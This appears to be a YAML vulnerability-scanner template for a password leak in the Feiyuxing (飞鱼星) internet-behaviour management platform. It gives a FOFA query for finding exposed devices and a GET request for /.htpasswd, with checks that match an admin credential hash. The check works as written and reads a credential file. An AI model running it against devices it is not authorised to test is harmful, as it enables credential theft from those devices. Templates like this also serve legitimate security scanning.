product: 飞鱼星上网行为管理
vName: 飞鱼星上网行为管理平台密码泄露
type: 信息泄漏
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search:
  FOFA: app="飞鱼星-路由器" && title!="飞鱼星企业级智能上网行为管理系统" && body="<title>&nbsp;"
protocol: http
link: https://www.cnblogs.com/lovebing/p/12605797.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /.htpasswd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'admin:'
              - $1$$.
            logic: and